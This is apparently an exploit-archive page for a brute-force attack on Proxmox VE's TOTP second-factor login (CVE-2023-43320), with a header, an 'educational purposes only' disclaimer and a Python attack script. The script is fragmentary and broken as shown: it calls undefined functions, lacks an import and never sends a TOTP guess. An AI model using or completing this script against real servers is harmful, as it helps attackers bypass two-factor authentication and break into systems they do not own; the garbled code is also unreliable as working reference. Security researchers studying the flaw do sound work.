Proxmox ve totp brute force Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2024-01-31 |
Type : remote |
Platform : linux
This exploit / vulnerability Proxmox ve totp brute force is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Proxmox VE TOTP Brute Force
# Date: 09/23/2023
# Exploit Author: Cory Cline, Gabe Rust
# Vendor Homepage: https://www.proxmox.com/en/
# Software Link: http://download.proxmox.com/iso/
# Version: 5.4 - 7.4-1
# Tested on: Debian
# CVE : CVE-2023-43320
import time
import requests
import urllib.parse
import json
import os
import urllib3
def attack(token):
global last_refresh_time
global auto_refresh_time
global target_url
global username
global password
global ticket_username
global ticket_data
if ( int(time.time()) > (last_refresh_time + (auto_refresh_time * 60)) ):
refresh_ticket(target_url, username, password)
last_refresh_time = int(time.time())
with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
res = [executor.submit(attack, token) for token in tokens]
concurrent.futures.wait(res)